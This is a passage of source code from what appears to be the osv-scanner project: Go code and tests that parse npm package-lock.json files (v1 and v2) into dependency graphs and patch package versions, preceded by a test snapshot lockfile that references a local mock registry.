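[TestNpmWrite - 1] { "name": "r", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "r", "version": "1.0.0", "license": "ISC", "workspaces": [ "W" ], "dependencies": { "@fake-registry/a": "^1.2.3", "@fake-registry/b": "^1.0.1" }, "devDependencies": { "a-dev": "npm:@fake-registry/a@^2.3.4" } }, "node_modules/@fake-registry/a": { "version": "1.2.4", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-1.2.4.tgz", "integrity": "sha512-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa==", "license": "OriginalLicenseDoNotSteal", "dependencies": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" } }, "node_modules/@fake-registry/b": { "version": "1.0.1", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-1.0.1.tgz", "integrity": "sha512-uocjkNUbEPBa/oFFYNq+CkWkkr4My+gJQHnB1fFqIrIQtvjbQ/4dtp/6Kmfb5SFJ/bVfAGZ8mmC+c3Bz4JISYQ==", "license": "ISC" }, "node_modules/@fake-registry/c": { "version": "1.1.1", "resolved": "http://localhost:4873/@fake-registry%2fc/-/c-1.1.1.tgz", "integrity":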
"sha512-bihWUzvU62dcwPN4TguhntQpC1zpj7H0fHAhffya6tl3BCrEdjqO4oEpNHF/jtU5PPvY0L60mJNUS6MbizEVrA==", "dev": true, "license": "BSD-2-Clause", "peerDependencies": { "@fake-registry/d": "^2.0.0" } }, "node_modules/@fake-registry/d": { "version": "2.2.2", "resolved": "http://localhost:4873/@fake-registry%2fd/-/d-2.2.2.tgz", "integrity": "sha512-YLeJVbfOCJZcUizGgpvPesIVSY9TYmWz2HcF+7mWxSuXuvu13FABprnRSDGEhljBRM+QAaUD+nbUHWenq2vL4w==", "dev": true, "license": "ISC" }, "node_modules/a-dev": { "name": "@fake-registry/a", "version": "2.3.5", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz", "integrity": "none", "dev": true, "license": "Stolen", "optionalDependencies": { "@fake-registry/b": "*" } }, "node_modules/a-dev/node_modules/@fake-registry/b": { "version": "2.0.0", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-2.0.0.tgz", "integrity": "sha512-ZYMUG0g+wowBRAVWuRMI9mV8/3IJ5tYw1i+Xedy5LjVo7RAQaOqJbhEWvdubBlkmaXSoI666cdnJIX/SI6FPpw==", "dev": true, "license": "ISC", "dependencies": { "@fake-registry/c": "^1.0.0", "@fake-registry/d": "^2.0.0" } }, "node_modules/w": { "resolved": "W", "link": true }, "W": { "name": "w", "version": "1.0.0", "license": "ISC", "devDependencies": { "@fake-registry/a": "^2.3.4" } }, "W/node_modules/@fake-registry/a": { "version": "2.3.5", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz", "integrity": "none", "dev": true, "license": "Stolen", "optionalDependencies": { "@fake-registry/b": "*" } }, "W/node_modules/@fake-registry/b": { "version": "2.0.0", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-2.0.0.tgz", "integrity": "sha512-ZYMUG0g+wowBRAVWuRMI9mV8/3IJ5tYw1i+Xedy5LjVo7RAQaOqJbhEWvdubBlkmaXSoI666cdnJIX/SI6FPpw==", "dev": true, "license": "ISC", "dependencies": { "@fake-registry/c": "^1.0.0", "@fake-registry/d": "^2.0.0" } } }, "dependencies": { "@fake-registry/a": { "version": "1.2.4", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-1.2.4.tgz", "integrity": 
"sha512-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa==", "requires": { "@fake-registry/b": "^1.0.0", "@fake-registry/e": "^1.0.0" } }, "@fake-registry/b": { "version": "1.0.1", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-1.0.1.tgz", "integrity": "sha512-uocjkNUbEPBa/oFFYNq+CkWkkr4My+gJQHnB1fFqIrIQtvjbQ/4dtp/6Kmfb5SFJ/bVfAGZ8mmC+c3Bz4JISYQ==" }, "@fake-registry/c": { "version": "1.1.1", "resolved": "http://localhost:4873/@fake-registry%2fc/-/c-1.1.1.tgz", "integrity": "sha512-bihWUzvU62dcwPN4TguhntQpC1zpj7H0fHAhffya6tl3BCrEdjqO4oEpNHF/jtU5PPvY0L60mJNUS6MbizEVrA==", "dev": true, "requires": {} }, "@fake-registry/d": { "version": "2.2.2", "resolved": "http://localhost:4873/@fake-registry%2fd/-/d-2.2.2.tgz", "integrity": "sha512-YLeJVbfOCJZcUizGgpvPesIVSY9TYmWz2HcF+7mWxSuXuvu13FABprnRSDGEhljBRM+QAaUD+nbUHWenq2vL4w==", "dev": true }, "a-dev": { "version": "npm:@fake-registry/a@2.3.5", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz", "integrity": "none", "dev": true, "requires": { "@fake-registry/b": "*" }, "dependencies": { "@fake-registry/b": { "version": "2.0.0", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-2.0.0.tgz", "integrity": "sha512-ZYMUG0g+wowBRAVWuRMI9mV8/3IJ5tYw1i+Xedy5LjVo7RAQaOqJbhEWvdubBlkmaXSoI666cdnJIX/SI6FPpw==", "dev": true, "requires": { "@fake-registry/c": "^1.0.0", "@fake-registry/d": "^2.0.0" } } } }, "w": { "version": "file:W", "requires": { "@fake-registry/a": "^2.3.4" }, "dependencies": { "@fake-registry/a": { "version": "2.3.5", "resolved": "http://localhost:4873/@fake-registry%2fa/-/a-2.3.5.tgz", "integrity": "none", "dev": true, "requires": { "@fake-registry/b": "*" } }, "@fake-registry/b": { "version": "2.0.0", "resolved": "http://localhost:4873/@fake-registry%2fb/-/b-2.0.0.tgz", "integrity": "sha512-ZYMUG0g+wowBRAVWuRMI9mV8/3IJ5tYw1i+Xedy5LjVo7RAQaOqJbhEWvdubBlkmaXSoI666cdnJIX/SI6FPpw==", "dev": true, "requires": { "@fake-registry/c": "^1.0.0", 
"@fake-registry/d": "^2.0.0" } } } } } } --- ================================================ FILE: internal/resolution/lockfile/lockfile.go ================================================ // Package lockfile provides functionality for reading and writing lockfiles. package lockfile import ( "bytes" "fmt" "io" "os" "path/filepath" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/resolution/depfile" ) type DependencyPatch struct { Pkg resolve.PackageKey OrigVersion string NewVersion string } type ReadWriter interface { // System returns which ecosystem this ReadWriter is for. System() resolve.System // Read parses a lockfile into a resolved graph Read(file depfile.DepFile) (*resolve.Graph, error) // Write applies the DependencyPatches to the lockfile, with minimal changes to the file. // `original` is the original lockfile to read from. The updated lockfile is written to `output`. Write(original depfile.DepFile, output io.Writer, patches []DependencyPatch) error } func Overwrite(rw ReadWriter, filename string, patches []DependencyPatch) error { r, err := depfile.OpenLocalDepFile(filename) if err != nil { return err } var buf bytes.Buffer err = rw.Write(r, &buf, patches) r.Close() // Make sure the file is closed before we start writing to it. if err != nil { return err } //nolint:gosec // Complaining about the 0644 permissions. // The file already exists anyway so the permissions don't matter. 
if err := os.WriteFile(filename, buf.Bytes(), 0644); err != nil { return err } return nil } func GetReadWriter(pathToLockfile string) (ReadWriter, error) { base := filepath.Base(pathToLockfile) switch base { case "package-lock.json": return NpmReadWriter{}, nil default: return nil, fmt.Errorf("unsupported lockfile type: %s", base) } } ================================================ FILE: internal/resolution/lockfile/npm.go ================================================ package lockfile import ( "encoding/json" "errors" "fmt" "io" "path/filepath" "strings" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" ) type NpmReadWriter struct{} func (NpmReadWriter) System() resolve.System { return resolve.NPM } type npmLockDependency struct { // For an aliased package, Version is like "npm:[name]@[version]" Version string `json:"version"` Dependencies map[string]npmLockDependency `json:"dependencies,omitempty"` Dev bool `json:"dev,omitempty"` Optional bool `json:"optional,omitempty"` Requires map[string]string `json:"requires,omitempty"` } type npmLockPackage struct { // For an aliased package, Name is the real package name Name string `json:"name"` Version string `json:"version"` Resolved string `json:"resolved"` Dependencies map[string]string `json:"dependencies,omitempty"` DevDependencies map[string]string `json:"devDependencies,omitempty"` OptionalDependencies map[string]string `json:"optionalDependencies,omitempty"` PeerDependencies map[string]string `json:"peerDependencies,omitempty"` Dev bool `json:"dev,omitempty"` DevOptional bool `json:"devOptional,omitempty"` Optional bool `json:"optional,omitempty"` Link bool `json:"link,omitempty"` } type npmLockfile struct { Version int `json:"lockfileVersion"` // npm v1- lockfiles use "dependencies" Dependencies map[string]npmLockDependency 
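`json:"dependencies,omitempty"`
	// npm v2+ lockfiles use "packages"
	Packages map[string]npmLockPackage `json:"packages,omitempty"`
}

// npmDependencyVersionSpec is one requirement of a node: the version string
// that was asked for and the dependency type it was declared with.
type npmDependencyVersionSpec struct {
	Version string
	DepType dep.Type
}

// npmNodeModule is one directory of the node_modules tree that Read rebuilds
// in memory before adding edges to the graph.
type npmNodeModule struct {
	NodeID     resolve.NodeID                      // graph node created for this directory
	Parent     *npmNodeModule                      // enclosing directory; findDependencyNode walks this chain until nil
	Children   map[string]*npmNodeModule           // keyed on package name
	Deps       map[string]npmDependencyVersionSpec // requirements, keyed on the name they are required under
	ActualName string                              // set if the node is an alias, the real package name this refers to
}

// IsAliased reports whether ActualName is set.
func (n npmNodeModule) IsAliased() bool {
	return n.ActualName != ""
}

// Read parses a package-lock.json into a resolve.Graph.
//
// The node_modules tree is first rebuilt in memory: from "packages" when the
// lockfile has it, otherwise from the "dependencies" object together with the
// package.json opened through file.Open. Every requirement is then resolved by
// walking up that tree, and aliased nodes are renamed to their real package
// name once all edges exist.
//
// Requirements that cannot be matched to an installed package are skipped
// silently, so the returned graph has no edge (and no error) for them.
func (rw NpmReadWriter) Read(file depfile.DepFile) (*resolve.Graph, error) {
	dec := json.NewDecoder(file)
	var lockJSON npmLockfile
	if err := dec.Decode(&lockJSON); err != nil {
		return nil, err
	}

	// Build the node_modules directory tree in memory & add unconnected nodes into graph
	var g *resolve.Graph
	var nodeModuleTree *npmNodeModule
	var err error
	switch {
	case lockJSON.Packages != nil:
		g, nodeModuleTree, err = rw.nodesFromPackages(lockJSON)
	case lockJSON.Dependencies != nil:
		manifestFile, ferr := file.Open("package.json")
		if ferr != nil {
			// Wrap ferr, not err: err is still nil here, so wrapping it would
			// drop the actual reason the manifest could not be opened.
			return nil, fmt.Errorf("failed to open package.json (required for parsing lockfileVersion 1): %w", ferr)
		}
		defer manifestFile.Close()
		g, nodeModuleTree, err = rw.nodesFromDependencies(lockJSON, manifestFile)
	default:
		return nil, errors.New("no dependencies in package-lock.json")
	}
	if err != nil {
		return nil, fmt.Errorf("error when parsing package-lock.json: %w", err)
	}

	// Traverse the graph (somewhat inefficiently) to add edges between nodes
	aliasNodes := make(map[resolve.NodeID]string)
	todo := []*npmNodeModule{nodeModuleTree}
	// seen keeps the walk finite even when a directory is reachable twice
	// (for example a workspace linked into the root node_modules).
	seen := make(map[*npmNodeModule]struct{})
	seen[nodeModuleTree] = struct{}{}

	for len(todo) > 0 {
		node := todo[0]
		todo = todo[1:]

		if node.IsAliased() {
			// Note which nodes that have to be renamed because of aliasing
			// Don't rename them now because we rely on the names for working out edges
			aliasNodes[node.NodeID] = node.ActualName
		}

		// Add the directory's children to the queue
		for _, child := range node.Children {
			if _, ok := seen[child]; !ok {
				todo = append(todo, child)
				seen[child] = struct{}{}
			}
		}

		// Add edges to the correct dependency nodes
		for depName, depSpec := range node.Deps {
			depNode := rw.findDependencyNode(node, depName)
			if depNode == -1 {
				// The dependency is apparently not in the package-lock.json.
				// This probably means the lockfile is malformed, and npm would usually error installing this.
				// But there are some cases (with workspaces) that npm doesn't error.
				// We just always ignore the error to make it work.
				// TODO: g.AddError(...)
				continue
			}
			if err := g.AddEdge(node.NodeID, depNode, depSpec.Version, depSpec.DepType); err != nil {
				return nil, err
			}
		}
	}

	// Add alias KnownAs attribute and rename them correctly
	for i, e := range g.Edges {
		if _, ok := aliasNodes[e.To]; ok {
			name := g.Nodes[e.To].Version.Name
			g.Edges[i].Type.AddAttr(dep.KnownAs, name)
		}
	}
	for i := range g.Nodes {
		if name, ok := aliasNodes[resolve.NodeID(i)]; ok {
			g.Nodes[i].Version.Name = name
		}
	}

	return g, nil
}

// findDependencyNode returns the node that a requirement named depName
// resolves to when looked up from node: the nearest ancestor directory
// (starting with node itself) that has a child of that name. It returns -1
// when no directory on the way up contains it.
func (rw NpmReadWriter) findDependencyNode(node *npmNodeModule, depName string) resolve.NodeID {
	// Walk up the node_modules to find which node would be used as the requirement
	for cur := node; cur != nil; cur = cur.Parent {
		if child, ok := cur.Children[depName]; ok {
			return child.NodeID
		}
	}

	return resolve.NodeID(-1)
}

// reVersionAliasedDeps rewrites the map in place so that every Version holds
// only the version part returned by manifest.SplitNPMAlias.
func (rw NpmReadWriter) reVersionAliasedDeps(deps map[string]npmDependencyVersionSpec) {
	// for the dependency maps, change versions from "npm:pkg@version" to "version"
	for k, v := range deps {
		_, v.Version = manifest.SplitNPMAlias(v.Version)
		deps[k] = v
	}
}

// Write copies the original package-lock.json to output with the given patches
// applied to both its "packages" and its "dependencies" section.
//
// The replacement data for a patched entry is fetched from an npm registry
// through a client built from the directory that holds the lockfile.
// NOTE(review): presumably that picks up project-level npm configuration (for
// example an .npmrc next to the lockfile) - confirm in datasource. If so, the
// URLs and hashes written into the lockfile are only as trustworthy as that
// directory's configuration, which matters when patching a checkout you do
// not control.
func (rw NpmReadWriter) Write(original depfile.DepFile, output io.Writer, patches []DependencyPatch) error {
	var buf strings.Builder
	_, err := io.Copy(&buf, original)
	if err != nil {
		return err
	}
	lock := buf.String()

	patchMap := make(map[string]map[string]string) // name -> old -> new
	for _, p := range patches {
		if _, ok := patchMap[p.Pkg.Name]; !ok {
			patchMap[p.Pkg.Name] = make(map[string]string)
		}
		patchMap[p.Pkg.Name][p.OrigVersion] = p.NewVersion
	}

	api, err := datasource.NewNpmRegistryAPIClient(filepath.Dir(original.Path()))
	if err != nil {
		return err
	}

	if lock, err = rw.modifyPackageLockPackages(lock, patchMap, api); err != nil {
		return err
	}

	if lock, err = rw.modifyPackageLockDependencies(lock, patchMap, api); err != nil {
		return err
	}

	// Write out modified package-lock.json
	_, err = io.WriteString(output, lock)

	return err
}

================================================
FILE: internal/resolution/lockfile/npm_test.go
================================================
package lockfile_test

import (
	"bytes"
	"os"
	"path/filepath"
	"testing"

	"deps.dev/util/resolve"
	"deps.dev/util/resolve/schema"
	"github.com/google/go-cmp/cmp"
	"github.com/google/osv-scanner/v2/internal/resolution/depfile"
	"github.com/google/osv-scanner/v2/internal/resolution/lockfile"
	"github.com/google/osv-scanner/v2/internal/testutility"
)

func TestNpmReadV2(t *testing.T) {
	t.Parallel()

	// This lockfile was generated using a private registry with https://verdaccio.org/
	// Mock packages were published to it and installed with npm.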
df, err := depfile.OpenLocalDepFile("./testdata/npm_v2/package-lock.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := lockfile.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if err := got.Canon(); err != nil { t.Fatalf("failed canonicalizing got graph: %v", err) } want, err := schema.ParseResolve(` r 1.0.0 @fake-registry/a@^1.2.3 1.2.3 Opt|$b@^1.0.0 b: @fake-registry/b@^1.0.1 1.0.1 Dev KnownAs a-dev|@fake-registry/a@^2.3.4 2.3.4 @fake-registry/b@^2.0.0 2.0.0 c: @fake-registry/c@^1.0.0 1.1.1 Scope peer|$d@^2.0.0 d: @fake-registry/d@^2.0.0 2.2.2 # workspace w@* 1.0.0 Dev|@fake-registry/a@^2.3.4 2.3.4 @fake-registry/b@^2.0.0 2.0.0 $c@^1.0.0 $d@^2.0.0 `, resolve.NPM) if err != nil { t.Fatalf("error parsing want graph: %v", err) } if err := want.Canon(); err != nil { t.Fatalf("failed canonicalizing want graph: %v", err) } if diff := cmp.Diff(want, got); diff != "" { t.Errorf("npm lockfile mismatch (-want +got):\n%s", diff) } } func TestNpmReadV1(t *testing.T) { t.Parallel() // This lockfile was generated using a private registry with https://verdaccio.org/ // Mock packages were published to it and installed with npm. 
df, err := depfile.OpenLocalDepFile("./testdata/npm_v1/package-lock.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := lockfile.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if err := got.Canon(); err != nil { t.Fatalf("failed canonicalizing got graph: %v", err) } want, err := schema.ParseResolve(` r 1.0.0 @fake-registry/a@^1.2.3 1.2.3 $b@^1.0.0 b: @fake-registry/b@^1.0.1 1.0.1 Dev KnownAs a-dev|@fake-registry/a@^2.3.4 2.3.4 # all indirect dependencies become regular because it's impossible to tell type in v1 @fake-registry/b@^2.0.0 2.0.0 @fake-registry/c@^1.0.0 1.1.1 # peerDependencies are not supported in v1 @fake-registry/d@^2.0.0 2.2.2 # v1 does not support workspaces `, resolve.NPM) if err != nil { t.Fatalf("error parsing want graph: %v", err) } if err := want.Canon(); err != nil { t.Fatalf("failed canonicalizing want graph: %v", err) } if diff := cmp.Diff(want, got); diff != "" { t.Errorf("npm lockfile mismatch (-want +got):\n%s", diff) } } func TestNpmReadTypeOrder(t *testing.T) { t.Parallel() // Testing the behavior when a package is included in multiple dependency type fields. // Empirically, devDependencies > optionalDependencies > dependencies > peerDependencies // This lockfile was manually constructed. 
df, err := depfile.OpenLocalDepFile("./testdata/npm_type_order/package-lock.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := lockfile.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if err := got.Canon(); err != nil { t.Fatalf("failed canonicalizing got graph: %v", err) } want, err := schema.ParseResolve(` root 1.0.0 Dev|a@4.0.0 4.0.0 Opt|b@3.0.0 3.0.0 c@2.0.0 2.0.0 Scope peer|d@1.0.0 1.0.0 `, resolve.NPM) if err != nil { t.Fatalf("error parsing want graph: %v", err) } if err := want.Canon(); err != nil { t.Fatalf("failed canonicalizing want graph: %v", err) } if diff := cmp.Diff(want, got); diff != "" { t.Errorf("npm lockfile mismatch (-want +got):\n%s", diff) } } func TestNpmWrite(t *testing.T) { t.Parallel() // Set up mock npm registry srv := testutility.NewMockHTTPServer(t) srv.SetResponseFromFile(t, "/@fake-registry%2fa/1.2.4", "./testdata/npm_registry/@fake-registry-a-1.2.4.json") srv.SetResponseFromFile(t, "/@fake-registry%2fa/2.3.5", "./testdata/npm_registry/@fake-registry-a-2.3.5.json") // Copy package-lock.json to temporary directory dir := testutility.CreateTestDir(t) b, err := os.ReadFile("./testdata/npm_v2/package-lock.json") if err != nil { t.Fatalf("could not read test file: %v", err) } file := filepath.Join(dir, "package-lock.json") if err := os.WriteFile(file, b, 0600); err != nil { t.Fatalf("could not copy test file: %v", err) } // create an npmrc file in temp directory pointing to mock registry npmrcFile, err := os.Create(filepath.Join(dir, ".npmrc")) if err != nil { t.Fatalf("could not create .npmrc file: %v", err) } if _, err := npmrcFile.WriteString("registry=" + srv.URL); err != nil { t.Fatalf("failed writing npmrc file: %v", err) } patches := []lockfile.DependencyPatch{ { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: "@fake-registry/a", }, OrigVersion: "1.2.3", NewVersion: "1.2.4", }, { Pkg: resolve.PackageKey{ System: resolve.NPM, Name: 
"@fake-registry/a", }, OrigVersion: "2.3.4", NewVersion: "2.3.5", }, } df, err := depfile.OpenLocalDepFile(file) if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() buf := new(bytes.Buffer) npmRW := lockfile.NpmReadWriter{} if err := npmRW.Write(df, buf, patches); err != nil { t.Fatalf("unable to update npm package-lock.json: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, buf.String()) } ================================================ FILE: internal/resolution/lockfile/npm_v1.go ================================================ package lockfile import ( "context" "encoding/json" "fmt" "io" "strings" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/tidwall/gjson" "github.com/tidwall/sjson" ) // Old-style (npm < 7 / lockfileVersion 1) dependencies structure // https://docs.npmjs.com/cli/v6/configuring-npm/package-lock-json // Installed packages stored in recursive "dependencies" object // with "requires" field listing direct dependencies, and each possibly having their own "dependencies" // No dependency information package-lock.json for the root node, so we must also have the package.json func (rw NpmReadWriter) nodesFromDependencies(lockJSON npmLockfile, manifestFile io.Reader) (*resolve.Graph, *npmNodeModule, error) { // Need to grab the root requirements from the package.json, since it's not in the lockfile var manifestJSON manifest.PackageJSON if err := json.NewDecoder(manifestFile).Decode(&manifestJSON); err != nil { return nil, nil, err } nodeModuleTree := &npmNodeModule{ Children: make(map[string]*npmNodeModule), Deps: make(map[string]npmDependencyVersionSpec), } // The order we process dependency types here is to match npm's behavior. 
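for name, version := range manifestJSON.PeerDependencies {
		var typ dep.Type
		typ.AddAttr(dep.Scope, "peer")
		// TODO: check peerDependenciesMeta for optional peer dependencies
		nodeModuleTree.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: typ}
	}
	for name, version := range manifestJSON.Dependencies {
		nodeModuleTree.Deps[name] = npmDependencyVersionSpec{Version: version}
	}
	for name, version := range manifestJSON.OptionalDependencies {
		nodeModuleTree.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: dep.NewType(dep.Opt)}
	}
	for name, version := range manifestJSON.DevDependencies {
		nodeModuleTree.Deps[name] = npmDependencyVersionSpec{Version: version, DepType: dep.NewType(dep.Dev)}
	}
	rw.reVersionAliasedDeps(nodeModuleTree.Deps)

	var g resolve.Graph
	nodeModuleTree.NodeID = g.AddNode(resolve.VersionKey{
		PackageKey: resolve.PackageKey{
			System: resolve.NPM,
			Name:   manifestJSON.Name,
		},
		VersionType: resolve.Concrete,
		Version:     manifestJSON.Version,
	})

	err := rw.computeDependenciesRecursive(&g, nodeModuleTree, lockJSON.Dependencies)

	return &g, nodeModuleTree, err
}

// computeDependenciesRecursive adds a graph node and a tree entry under parent
// for every package in deps, then descends into each package's own nested
// "dependencies" object.
func (rw NpmReadWriter) computeDependenciesRecursive(g *resolve.Graph, parent *npmNodeModule, deps map[string]npmLockDependency) error {
	for name, d := range deps {
		actualName, version := manifest.SplitNPMAlias(d.Version)
		nID := g.AddNode(resolve.VersionKey{
			PackageKey: resolve.PackageKey{
				System: resolve.NPM,
				Name:   name,
			},
			VersionType: resolve.Concrete,
			Version:     version,
		})
		nm := &npmNodeModule{
			Parent:     parent,
			NodeID:     nID,
			Children:   make(map[string]*npmNodeModule),
			Deps:       make(map[string]npmDependencyVersionSpec),
			ActualName: actualName,
		}

		// The requires map includes regular dependencies AND optionalDependencies
		// but it does not include peerDependencies or devDependencies.
		// The generated graphs will lack the edges between peers
		for reqName, reqVersion := range d.Requires {
			nm.Deps[reqName] = npmDependencyVersionSpec{Version: reqVersion}
		}
		rw.reVersionAliasedDeps(nm.Deps)

		parent.Children[name] = nm
		if d.Dependencies != nil {
			if err := rw.computeDependenciesRecursive(g, nm, d.Dependencies); err != nil {
				return err
			}
		}
	}

	return nil
}

// modifyPackageLockDependencies applies patches (name -> old version -> new
// version) to the lockfileVersion 1 "dependencies" object. A lockfile without
// that object is returned unchanged.
func (rw NpmReadWriter) modifyPackageLockDependencies(lockJSON string, patches map[string]map[string]string, api *datasource.NpmRegistryAPIClient) (string, error) {
	if !gjson.Get(lockJSON, "dependencies").Exists() {
		return lockJSON, nil
	}

	return rw.modifyPackageLockDependenciesRecurse(lockJSON, "dependencies", 1, patches, api)
}

// modifyPackageLockDependenciesRecurse patches the "dependencies" object found
// at path and, before that, every "dependencies" object nested below it.
// depth is the nesting level of path and only controls the indentation of the
// rewritten "requires" object.
//
// For each patched entry the "version", "resolved", "integrity" and "requires"
// fields are replaced with data from the registry response. Failures of the
// JSON edits are returned to the caller instead of being discarded, so a
// lockfile that could not be edited is never reported as patched.
//
// NOTE(review): "resolved" and "integrity" both come from the same registry
// response, so the hash written here does not independently vouch for the
// tarball URL. When the response carries no dist.integrity an empty string is
// written; consider rejecting or flagging that case.
func (rw NpmReadWriter) modifyPackageLockDependenciesRecurse(lockJSON, path string, depth int, patches map[string]map[string]string, api *datasource.NpmRegistryAPIClient) (string, error) {
	for pkg, data := range gjson.Get(lockJSON, path).Map() {
		pkgPath := fmt.Sprintf("%s.%s", path, gjson.Escape(pkg))
		if data.Get("dependencies").Exists() {
			var err error
			lockJSON, err = rw.modifyPackageLockDependenciesRecurse(lockJSON, pkgPath+".dependencies", depth+1, patches, api)
			if err != nil {
				return lockJSON, err
			}
		}

		isAlias := false
		realPkg, version := manifest.SplitNPMAlias(data.Get("version").String())
		if realPkg != "" {
			isAlias = true
			pkg = realPkg
		}

		upgrades, ok := patches[pkg]
		if !ok {
			continue
		}
		newVer, ok := upgrades[version]
		if !ok {
			continue
		}

		// update dependency in place
		npmData, err := api.FullJSON(context.Background(), pkg, newVer)
		if err != nil {
			return lockJSON, err
		}

		// From what I can tell, the only fields to update are "version" "resolved" "integrity" and "requires"
		newVersion := npmData.Get("version").String()
		if isAlias {
			newVersion = fmt.Sprintf("npm:%s@%s", pkg, newVersion)
		}
		fields := []struct{ key, value string }{
			{"version", newVersion},
			{"resolved", npmData.Get("dist.tarball").String()},
			{"integrity", npmData.Get("dist.integrity").String()},
		}
		for _, f := range fields {
			updated, err := sjson.Set(lockJSON, pkgPath+"."+f.key, f.value)
			if err != nil {
				return lockJSON, err
			}
			lockJSON = updated
		}

		// formatting & padding to output for the correct level at this depth
		pretty := fmt.Sprintf("|@pretty:{\"prefix\": %q}", strings.Repeat(" ", 4*depth+2))
		reqs := npmData.Get("dependencies" + pretty)
		requiresPath := pkgPath + ".requires"
		switch {
		case reqs.Exists():
			// remove trailing newlines that @pretty creates for objects
			updated, err := sjson.SetRaw(lockJSON, requiresPath, strings.TrimSuffix(reqs.Raw, "\n"))
			if err != nil {
				return lockJSON, err
			}
			lockJSON = updated
		case gjson.Get(lockJSON, requiresPath).Exists():
			// The new version has no dependencies: drop the stale "requires".
			updated, err := sjson.Delete(lockJSON, requiresPath)
			if err != nil {
				return lockJSON, err
			}
			lockJSON = updated
		}
	}

	return lockJSON, nil
}

================================================
FILE: internal/resolution/lockfile/npm_v2.go
================================================
package lockfile

import (
	"cmp"
	"context"
	"errors"
	"maps"
	"path/filepath"
	"slices"
	"strings"

	"deps.dev/util/resolve"
	"deps.dev/util/resolve/dep"
	"github.com/google/osv-scanner/v2/internal/datasource"
	"github.com/tidwall/gjson"
	"github.com/tidwall/pretty"
	"github.com/tidwall/sjson"
)

// New-style (npm >= 7 / lockfileVersion 2+) structure
// https://docs.npmjs.com/cli/v9/configuring-npm/package-lock-json
// Installed packages are in the flat "packages" object, keyed by the install path
// e.g. "node_modules/foo/node_modules/bar"
// packages contain most information from their own manifests.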
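// nodesFromPackages adds one graph node per entry of the "packages" object and
// returns the graph together with the root of the reconstructed node_modules
// tree. No edges are added here.
//
// Entries whose key has no "node_modules/" part are treated as workspace
// directories; entries flagged as links attach such a workspace to the root
// node_modules. A link entry that is not directly inside the root
// node_modules, or whose "resolved" value names no known workspace directory,
// is reported as an error rather than a panic: the lockfile is input the
// caller does not control, and a malformed one should fail the parse instead
// of crashing the process.
func (rw NpmReadWriter) nodesFromPackages(lockJSON npmLockfile) (*resolve.Graph, *npmNodeModule, error) {
	var g resolve.Graph
	// Create graph nodes and reconstruct the node_modules folder structure in memory
	root, ok := lockJSON.Packages[""]
	if !ok {
		return nil, nil, errors.New("missing root node")
	}
	nID := g.AddNode(resolve.VersionKey{
		PackageKey: resolve.PackageKey{
			System: resolve.NPM,
			Name:   root.Name,
		},
		VersionType: resolve.Concrete,
		Version:     root.Version,
	})
	nodeModuleTree := rw.makeNodeModuleDeps(root, true)
	nodeModuleTree.NodeID = nID

	// paths for npm workspace subfolders, not inside root node_modules
	workspaceModules := make(map[string]*npmNodeModule)
	workspaceModules[""] = nodeModuleTree

	// iterate keys by node_modules depth
	for _, k := range rw.packageNamesByNodeModuleDepth(lockJSON.Packages) {
		if k == "" {
			// skip the root node
			continue
		}
		pkg, ok := lockJSON.Packages[k]
		if !ok {
			// k was taken from this very map, so this should not happen.
			return nil, nil, errors.New("key not in packages")
		}
		path := strings.Split(k, "node_modules/")
		if len(path) == 1 {
			// the path does not contain "node_modules/", assume this is a workspace directory
			nID := g.AddNode(resolve.VersionKey{
				PackageKey: resolve.PackageKey{
					System: resolve.NPM,
					Name:   path[0], // This will get replaced by the name from the symlink
				},
				VersionType: resolve.Concrete,
				Version:     pkg.Version,
			})
			m := rw.makeNodeModuleDeps(pkg, true) // NB: including the dev dependencies
			m.NodeID = nID
			workspaceModules[path[0]] = m

			continue
		}

		if pkg.Link {
			// This is the symlink to the workspace directory in node_modules
			if len(path) != 2 || path[0] != "" {
				// Not sure what situation would lead to this
				return nil, nil, errors.New("found symlink in package-lock.json that's not in root node_modules directory")
			}
			m := workspaceModules[pkg.Resolved]
			if m == nil {
				// Can symlinks show up without workspaces?
				return nil, nil, errors.New("symlink in package-lock.json processed before real directory")
			}

			// attach the workspace to the tree
			pkgName := path[1]
			nodeModuleTree.Children[pkgName] = m
			if pkg.Resolved == "" {
				// weird case: the root directory is symlinked into its own node_modules
				continue
			}
			m.Parent = nodeModuleTree

			// rename the node to the name it would be referred to as in package.json
			g.Nodes[m.NodeID].Version.Name = pkgName
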